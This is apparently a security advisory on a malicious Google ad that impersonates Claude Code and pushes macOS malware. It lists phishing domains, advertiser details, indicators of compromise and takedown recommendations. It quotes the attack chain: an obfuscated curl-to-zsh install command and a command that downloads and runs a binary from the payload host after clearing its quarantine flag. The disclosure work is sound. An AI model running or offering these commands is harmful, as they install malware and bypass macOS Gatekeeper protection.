Malicious Google Ad impersonating Claude Code — distributes macOS malware

[marek-vybiral]

Summary

A sponsored Google Ad for the search query "claude code" leads to a fake website at cl-code.it.com that distributes macOS malware disguised as a Claude Code install script. As of 2025-02-25, this is the no. 1 result (sponsored) for that query.

Additional malicious sponsored results were found for the query "claude code install":

• claude-code-macos.com
• relatestudios.com

Both use the same title: "Install Claude Code for macOS - Claude Code Docs"

Attack Chain

The fake site presents an install command:

curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20...<redacted>'|base64 -D)| zsh

Three layers of obfuscation:

1. The base64 string decodes to https://contatoplus.com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b
2. That URL returns a base64+gzip-encoded shell script
3. Which downloads and executes an unsigned macOS binary:

curl -o /tmp/helper https://contatoplus.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper

The xattr -c specifically bypasses macOS Gatekeeper quarantine protection.

Google Ads Advertiser Info

• Advertiser name: Angel Velasco
• Based in: the United States
• Identity status: Verified by Google
• Ads Transparency page: https://adstransparency.google.com/advertiser/AR07218940314826833921
• Total ads running: 8
• Likely a compromised or fraudulent verified advertiser account

Indicators of Compromise

Indicator	Value
Phishing domain	cl-code.it.com
Phishing domain	claude-code-macos.com
Phishing domain	relatestudios.com
Payload host	contatoplus.com
Payload URL	contatoplus.com/n8n/update
Dropped binary	/tmp/helper
Google Ads campaign ID	23605260130

Recommendation

• Request takedown of the Google Ad (campaign ID 23605260130)
• Request takedown of cl-code.it.com, claude-code-macos.com, relatestudios.com, and contatoplus.com
• Consider a security advisory warning users to only install Claude Code via npm or the official docs